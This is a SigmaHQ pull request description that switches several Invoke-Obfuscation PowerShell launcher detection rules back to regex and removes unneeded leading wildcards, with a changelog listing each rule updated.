Reverted back the deleted comments @frack113 as they were there in case we wanted to revert back to regex.
I reverted some CLI rules to use regex as its much more accurate and i don't see why we don't keep them as regex anymore. Changing them to contains is basically "regex" for a lot of EDR/SIEMs
Summary of the Pull Request
.*
in the regexChangelog
update: Invoke-Obfuscation CLIP+ Launcher - PowerShell Module - Remove unnecessary starting wildcard update: Invoke-Obfuscation STDIN+ Launcher - PowerShell Module - Remove unnecessary starting wildcard update: Invoke-Obfuscation VAR+ Launcher - PowerShell Module - Remove unnecessary starting wildcard update: Invoke-Obfuscation Via Stdin - PowerShell Module - Remove unnecessary starting wildcard update: Invoke-Obfuscation Via Use Clip - PowerShell Module - Remove unnecessary starting wildcard update: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module - Remove unnecessary starting wildcard update: Invoke-Obfuscation CLIP+ Launcher - PowerShell - Remove unnecessary starting wildcard update: Invoke-Obfuscation STDIN+ Launcher - Powershell - Remove unnecessary starting wildcard update: Invoke-Obfuscation VAR+ Launcher - PowerShell - Remove unnecessary starting wildcard update: Invoke-Obfuscation Via Stdin - Powershell - Remove unnecessary starting wildcard update: Invoke-Obfuscation Via Use Clip - Powershell - Remove unnecessary starting wildcard update: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell - Remove unnecessary starting wildcard update: Invoke-Obfuscation STDIN+ Launcher - Update rule to use regex for better accuracy in CLI update: Invoke-Obfuscation VAR+ Launcher - Update rule to use regex for better accuracy in CLI update: Invoke-Obfuscation Via Stdin - Update rule to use regex for better accuracy in CLI update: Invoke-Obfuscation Via Use Clip - Update rule to use regex for better accuracy in CLI
Example Log Event
N/A
Fixed Issues
N/A
SigmaHQ Rule Creation Conventions